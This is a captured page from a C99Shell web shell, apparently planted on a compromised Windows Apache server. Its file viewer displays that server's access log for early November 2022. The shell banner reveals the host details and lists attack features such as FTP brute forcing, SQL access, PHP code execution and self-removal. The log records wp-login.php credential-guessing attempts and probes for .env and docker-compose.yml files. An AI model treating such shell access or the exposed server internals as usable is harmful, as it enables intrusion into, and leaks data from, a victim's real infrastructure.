!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.11.04.log (2.84 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [03/Nov/2022:23:58:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51630
172.22.2.4 - - [03/Nov/2022:23:59:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Nov/2022:23:59:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
201.245.192.253 - - [04/Nov/2022:00:03:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.103 - - [04/Nov/2022:00:03:27 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [04/Nov/2022:00:03:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [04/Nov/2022:00:03:29 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.97 - - [04/Nov/2022:00:05:20 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [04/Nov/2022:00:05:21 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
40.77.167.3 - - [04/Nov/2022:00:05:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1414.pdf HTTP/1.1" 200 3207116
207.46.13.231 - - [04/Nov/2022:00:05:59 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:00:04:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:05:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
77.88.5.3 - - [04/Nov/2022:00:07:28 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:00:08:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:00:08:29 -0500] "HEAD / HTTP/1.1" 200 -
114.119.132.76 - - [04/Nov/2022:00:11:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3343.pdf HTTP/1.1" 200 482869
172.22.2.4 - - [04/Nov/2022:00:10:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.5.147 - - [04/Nov/2022:00:12:49 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+2JpD+SFyLDOZBGnybVNSSPNAoxHOXJLbd/xkZxXiFTofOHlB5RsKMRxPsgnD3DkHVYyQqdaowBODcTgbMHD0SzbuSMe2XPZGqXSXdpT8okP3cTEWY+2R8HBkvumzjUw6cWgDQPDrFYGzdzRXq7U7Go/qURlaJ3PhKjkubTFiwnPxlrTWr6zaa7End8ldFRuUBsLMH2B3fA0zR174xbWBjkKUfDg7+dLGPp2OpGuwgoS28ShEJAXK5UM8pmP3gNU60ip2oDB3t9w==&u=U2FsdGVkX18O+CIFWsDZOJGWUQA2l0wqCOnBtOJNtjxmTQ2w6fxF1IQcXCYl6/dV&y=U2FsdGVkX1/vdIyO+85jvZo+m9wBVRzJNNr8v4pAFGKb/j0Wr9Uuz2+ORN4dR4ha HTTP/1.1" 200 26
186.102.5.147 - - [04/Nov/2022:00:12:50 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+2SsFiTY1lCiNurIet5hkPWZCpjbMib8+TZCOHx+e/RmystQD9MM536ITQi497z8diRNH2Kno0ahy9DG1n0LXAu06P5zlvvpkvYJ0boU50bEZLsTcsuwgNSvI2AXSHuXEtlR6VgweQjQyLhhEPYkci1PBdMHRyhnPrwDn3hDrxfUsq4NTMdiQT5sxKUdM3GZV8GiPUfpeu+4MLX34lq7SZzLZYzVAbHhv+aha1dlOTOakFIyulAdNwl/QgF33yrSacW0/mo1BqTXTf008bCc8ujVf6TnoYyIs7ehJjnZNBKhlH6Oy5u1Ae0Fxv8Esn24PDpOjG4SmU3YFAKvscKeT+VxTjtVg1SAZqxxK8T/N2Iq7n/yjVfUkTj+ks0/1KYR9lan+tEUtIRrmbz40TfZDbogQZGH+nRfUF8QHWb+mDXcX5nbr/JCOHfPY/NBDS/0kFup8+tep3QKLQOKr1cAxJKsoIJzbDjcKXeEGXaciTiB+2RIrTZF+TSJUFyxRXmIgEcXbceoO5ONdnIpRt1ebWoWhipNh3vAh6E3fTaPDyAc3bPwJuwiLxBzFWWoHdHNed+NPICwPnZMv9N7gEDrxhqZl6YX5aGMp7QIoLICDP4z83P6WfDimy5CMSc6MKqR+CACdI3emkp4NnN75wgwIZwhB/RoGIHAvWSQx46mEwANF2eV6gRXCS2i6xbNhdjolqvay5chvVQrjM0vbFxlaiGU1VfvOMIDKlTDySi9z8tVhq1wOVy1zs2rX3AduQqzfqgv/Tt/J9KC2ItGmzFTtJHypgfrHSn/KL0OgplChN1DWvi514mzyoQGFSYyP5F+1XMz76LlyJh5LFd5XZrkrzEGQ28uiR/2Nkl6AChf8MKnhQf3cHIgk5xYZ718P0lNMYljkbJIpJZSyRSO4XEBDlPKgG0krMxQIv8jqdWdcwg+beBkoLxdhwgeFbU8ARN9BMEFntHsehi70xFlIn93Rq9T9YyyDxLDUyiyHRjEjBszsrO/I7h//vW47GAk2HHNAg1obWPu6RxKWFAAp3RVJScnOZOeZxf9o8AE1mwyTLxc3vJNphpxYO&u=U2FsdGVkX18O+CIFWsDZOJGWUQA2l0wqCOnBtOJNtjxmTQ2w6fxF1IQcXCYl6/dV&y=U2FsdGVkX1/vdIyO+85jvZo+m9wBVRzJNNr8v4pAFGKb/j0Wr9Uuz2+ORN4dR4ha HTTP/1.1" 200 26
172.22.2.4 - - [04/Nov/2022:00:12:50 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
186.102.5.147 - - [04/Nov/2022:00:12:50 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Nk55L3Hk+qVQDWPrSDa5xATejnXSsWG0sIPpoa+AlfulG7PmhPoqBBcHQi4MpQ44Sss2KgYksnAa53sWsBobDSglBAw6E6VlwhSZ/9eoTLTNOxHcatorIe0VRX8WhvxbneeYa5yhLs7ZLskDjZAsOKaFI9xMxQG0=&u=U2FsdGVkX18O+CIFWsDZOJGWUQA2l0wqCOnBtOJNtjxmTQ2w6fxF1IQcXCYl6/dV&y=U2FsdGVkX1/vdIyO+85jvZo+m9wBVRzJNNr8v4pAFGKb/j0Wr9Uuz2+ORN4dR4ha HTTP/1.1" 200 26
186.102.5.147 - - [04/Nov/2022:00:12:50 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Ki7E+o/gqfCiVO9nEUGoYfff/qsfTLLLwsST5fn/ymwPlsETYj2iuJY3zQjEIXbtBijk9X56HfwTPuFWk0r6kUwaVVsOoIOkv9BlcnV7A86NMRLYRw4iFAfCEzKgjwrGL2RsedDrtx9pVQA7DmVuLchwdssXX4Cw=&u=U2FsdGVkX18O+CIFWsDZOJGWUQA2l0wqCOnBtOJNtjxmTQ2w6fxF1IQcXCYl6/dV&y=U2FsdGVkX1/vdIyO+85jvZo+m9wBVRzJNNr8v4pAFGKb/j0Wr9Uuz2+ORN4dR4ha HTTP/1.1" 200 26
186.102.5.147 - - [04/Nov/2022:00:12:51 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+nAqpGpOEVmHxPhge5IrQFWMWf3/gAPWWb42tgfEw4k2IRf1dZyKCmsQLwExxE8hrV58R+2sx/xw2hN+rnMaCft/pEi3iOsgTTtP8zUchjVPrXOwSyY1q6CRdqHgCOTaxmxG9pK8NEzcqqjH6fD6lYJqqN/qPb5cI=&u=U2FsdGVkX18O+CIFWsDZOJGWUQA2l0wqCOnBtOJNtjxmTQ2w6fxF1IQcXCYl6/dV&y=U2FsdGVkX1/vdIyO+85jvZo+m9wBVRzJNNr8v4pAFGKb/j0Wr9Uuz2+ORN4dR4ha HTTP/1.1" 200 26
186.102.5.147 - - [04/Nov/2022:00:12:51 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX184z4U2fZEElH1vxwyKxxjjvCBUKDS9eaETOB9xu7bTN6dQfVt0MFzGBi6s4qk2+POPpe7TG8o3ywUexwTiyvwVvUjQZrnXNsjPXcMI0q3/WnQQZABY4l6b/0fM0+zgG/pbfQOYpY6OFyxB8wFcRlYeGrAcDQihRIYz+xlsH1UZusXZ2UxTBrE+znIsljUNCvPv/KeYeGI6ig==&u=U2FsdGVkX18O+CIFWsDZOJGWUQA2l0wqCOnBtOJNtjxmTQ2w6fxF1IQcXCYl6/dV&y=U2FsdGVkX1/vdIyO+85jvZo+m9wBVRzJNNr8v4pAFGKb/j0Wr9Uuz2+ORN4dR4ha HTTP/1.1" 200 26
172.22.2.4 - - [04/Nov/2022:00:12:54 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 200 660637
201.245.192.253 - - [04/Nov/2022:00:13:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:00:11:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
216.245.221.92 - - [04/Nov/2022:00:13:29 -0500] "HEAD / HTTP/1.1" 200 -
114.119.133.126 - - [04/Nov/2022:00:15:04 -0500] "-" 408 -
77.88.5.230 - - [04/Nov/2022:00:17:28 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:00:18:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:00:16:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Nov/2022:00:18:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:17:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
152.61.128.50 - - [04/Nov/2022:00:19:19 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [04/Nov/2022:00:21:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40517
201.245.192.253 - - [04/Nov/2022:00:21:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43667
93.158.161.72 - - [04/Nov/2022:00:21:39 -0500] "-" 408 -
77.88.5.232 - - [04/Nov/2022:00:21:45 -0500] "-" 408 -
93.158.161.29 - - [04/Nov/2022:00:21:50 -0500] "-" 408 -
77.88.5.27 - - [04/Nov/2022:00:21:55 -0500] "-" 408 -
77.88.5.249 - - [04/Nov/2022:00:22:10 -0500] "-" 408 -
77.88.5.49 - - [04/Nov/2022:00:22:25 -0500] "-" 408 -
40.77.167.46 - - [04/Nov/2022:00:22:40 -0500] "GET /BLA/resoluciones/AUTOS%202019/4390.pdf HTTP/1.1" 200 499041
77.88.5.82 - - [04/Nov/2022:00:22:55 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:00:23:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
89.187.171.167 - - [04/Nov/2022:00:23:15 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
216.245.221.92 - - [04/Nov/2022:00:23:29 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.5 - - [04/Nov/2022:00:23:55 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:00:22:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:23:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
93.158.161.50 - - [04/Nov/2022:00:24:55 -0500] "-" 408 -
77.88.5.214 - - [04/Nov/2022:00:27:09 -0500] "-" 408 -
201.245.192.253 - - [04/Nov/2022:00:28:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
112.46.68.23 - - [04/Nov/2022:00:28:06 -0500] "GET / HTTP/1.1" 400 946
216.245.221.92 - - [04/Nov/2022:00:28:29 -0500] "HEAD / HTTP/1.1" 200 -
201.244.219.164 - - [04/Nov/2022:00:28:32 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13093
172.22.2.4 - - [04/Nov/2022:00:28:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
77.88.5.10 - - [04/Nov/2022:00:30:09 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:00:29:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [04/Nov/2022:00:31:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40517
201.245.192.253 - - [04/Nov/2022:00:31:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43667
201.245.192.253 - - [04/Nov/2022:00:32:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:00:33:29 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.52 - - [04/Nov/2022:00:33:52 -0500] "GET /Publicaciones/2022EE242733.pdf HTTP/1.1" 404 228
77.88.5.165 - - [04/Nov/2022:00:35:09 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:00:34:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
39.106.54.67 - - [04/Nov/2022:00:36:09 -0500] "GET /galeria/galeria/fotos/juan-amarillo2P.jpg HTTP/1.1" 200 32696
172.22.2.4 - - [04/Nov/2022:00:34:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
201.245.192.253 - - [04/Nov/2022:00:37:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
40.77.167.52 - - [04/Nov/2022:00:38:25 -0500] "GET /Publicaciones/2022EE246850.pdf HTTP/1.1" 404 228
216.245.221.92 - - [04/Nov/2022:00:38:29 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:00:41:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40517
201.245.192.253 - - [04/Nov/2022:00:41:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43667
172.22.2.4 - - [04/Nov/2022:00:39:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:40:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [04/Nov/2022:00:42:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
77.88.5.221 - - [04/Nov/2022:00:43:09 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:00:43:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:44:16 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [04/Nov/2022:00:44:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60874
172.22.2.4 - - [04/Nov/2022:00:45:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:46:13 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 50799
201.245.192.253 - - [04/Nov/2022:00:47:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:00:46:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51183
216.245.221.92 - - [04/Nov/2022:00:48:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:48:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61974
172.22.2.4 - - [04/Nov/2022:00:49:52 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
172.22.2.4 - - [04/Nov/2022:00:50:02 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-693-12.docx HTTP/1.1" 200 25737
172.22.2.4 - - [04/Nov/2022:00:50:11 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4829
172.22.2.4 - - [04/Nov/2022:00:50:22 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-046-99.docx HTTP/1.1" 200 20918
172.22.2.4 - - [04/Nov/2022:00:50:34 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-672-14.docx HTTP/1.1" 200 22530
172.22.2.4 - - [04/Nov/2022:00:50:44 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
172.22.2.4 - - [04/Nov/2022:00:50:54 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-146-16.docx HTTP/1.1" 200 23021
172.22.2.4 - - [04/Nov/2022:00:51:03 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
172.22.2.4 - - [04/Nov/2022:00:51:13 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7450
172.22.2.4 - - [04/Nov/2022:00:51:23 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
172.22.2.4 - - [04/Nov/2022:00:51:32 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [04/Nov/2022:00:51:41 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 200 19486
172.22.2.4 - - [04/Nov/2022:00:51:51 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 200 22637
172.22.2.4 - - [04/Nov/2022:00:52:00 -0500] "GET /BLA/boletinlegal/norma_menu.php HTTP/1.1" 200 6318
172.22.2.4 - - [04/Nov/2022:00:52:09 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/null HTTP/1.1" 404 1038
172.22.2.4 - - [04/Nov/2022:00:52:21 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-273-11.docx HTTP/1.1" 200 22036
172.22.2.4 - - [04/Nov/2022:00:52:30 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 200 25011
172.22.2.4 - - [04/Nov/2022:00:52:38 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [04/Nov/2022:00:52:48 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/SENTENCIA%20C-703%20DE%202010.xls HTTP/1.1" 200 38912
201.245.192.253 - - [04/Nov/2022:00:52:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:00:52:57 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
77.88.5.167 - - [04/Nov/2022:00:53:09 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:00:51:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Nov/2022:00:53:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:52:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [04/Nov/2022:00:57:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:00:58:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:57:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:00:58:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [04/Nov/2022:01:02:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
77.88.5.29 - - [04/Nov/2022:01:03:09 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:01:03:29 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.131 - - [04/Nov/2022:01:03:56 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [04/Nov/2022:01:03:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:01:03:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46329
172.22.2.4 - - [04/Nov/2022:01:04:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47210
172.22.2.4 - - [04/Nov/2022:01:05:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
185.119.81.97 - - [04/Nov/2022:01:06:32 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [04/Nov/2022:01:06:33 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
65.49.20.77 - - [04/Nov/2022:01:07:29 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
152.61.128.50 - - [04/Nov/2022:01:07:30 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [04/Nov/2022:01:07:31 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [04/Nov/2022:01:07:31 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [04/Nov/2022:01:07:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [04/Nov/2022:01:08:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:01:09:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:01:09:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
201.245.192.253 - - [04/Nov/2022:01:12:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
93.158.161.36 - - [04/Nov/2022:01:13:09 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:01:11:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62772
216.245.221.92 - - [04/Nov/2022:01:13:29 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.97 - - [04/Nov/2022:01:16:04 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [04/Nov/2022:01:16:05 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [04/Nov/2022:01:14:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
39.106.54.67 - - [04/Nov/2022:01:16:44 -0500] "GET /galeria/galeria/fotos/juan-amarillo2P.jpg HTTP/1.1" 200 32696
172.22.2.4 - - [04/Nov/2022:01:15:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [04/Nov/2022:01:17:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
94.102.51.9 - - [04/Nov/2022:01:17:53 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [04/Nov/2022:01:18:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
216.245.221.92 - - [04/Nov/2022:01:18:29 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:01:21:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40181
201.245.192.253 - - [04/Nov/2022:01:21:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43188
172.22.2.4 - - [04/Nov/2022:01:21:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [04/Nov/2022:01:20:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:01:22:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
93.158.161.41 - - [04/Nov/2022:01:23:09 -0500] "-" 408 -
172.22.2.4 - - [04/Nov/2022:01:21:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
216.245.221.92 - - [04/Nov/2022:01:23:29 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:01:27:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:01:26:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Nov/2022:01:28:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:01:27:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
172.22.2.4 - - [04/Nov/2022:01:28:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
201.245.192.253 - - [04/Nov/2022:01:31:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40181
201.245.192.253 - - [04/Nov/2022:01:31:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43188
201.245.192.253 - - [04/Nov/2022:01:32:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
77.88.5.171 - - [04/Nov/2022:01:33:09 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:01:33:29 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.57 - - [04/Nov/2022:01:33:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0950.pdf HTTP/1.1" 304 -
172.22.2.4 - - [04/Nov/2022:01:32:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:01:33:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [04/Nov/2022:01:37:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [04/Nov/2022:01:38:29 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.102 - - [04/Nov/2022:01:38:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [04/Nov/2022:01:38:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [04/Nov/2022:01:38:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
167.248.133.47 - - [04/Nov/2022:01:39:22 -0500] "GET / HTTP/1.1" 200 319
167.248.133.47 - - [04/Nov/2022:01:39:22 -0500] "GET / HTTP/1.1" 200 319
167.248.133.47 - - [04/Nov/2022:01:39:22 -0500] "PRI * HTTP/2.0" 400 946
167.248.133.47 - - [04/Nov/2022:01:39:22 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [04/Nov/2022:01:39:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:01:38:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:01:39:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
201.245.192.253 - - [04/Nov/2022:01:40:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:01:40:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
201.245.192.253 - - [04/Nov/2022:01:41:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40181
201.245.192.253 - - [04/Nov/2022:01:41:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43188
77.88.5.173 - - [04/Nov/2022:01:43:09 -0500] "-" 408 -
216.245.221.92 - - [04/Nov/2022:01:43:29 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Nov/2022:01:41:50 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 62772
172.22.2.4 - - [04/Nov/2022:01:44:25 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
172.22.2.4 - - [04/Nov/2022:01:44:26 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [04/Nov/2022:01:44:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Nov/2022:01:45:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [04/Nov/2022:01:45:52 -0500] "GET /BLA/boletinlegal/docker-compose.yml HTTP/1.1" 404 1018
190.242.24.39 - - [04/Nov/2022:01:46:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
